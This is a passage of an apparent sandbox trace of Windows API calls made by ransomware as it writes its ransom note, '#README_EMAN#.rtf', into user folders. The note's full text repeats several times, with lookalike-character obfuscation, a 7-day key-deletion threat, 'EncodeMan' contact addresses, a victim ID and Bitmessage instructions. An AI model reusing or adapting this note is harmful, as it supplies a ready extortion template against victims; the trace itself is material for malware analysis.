vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.697] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.698] CloseHandle (hObject=0x27c) returned 1 [0301.698] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\#readme_eman#.rtf")) returned 0xffffffff [0301.698] GetLastError () returned 0x2 [0301.698] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur 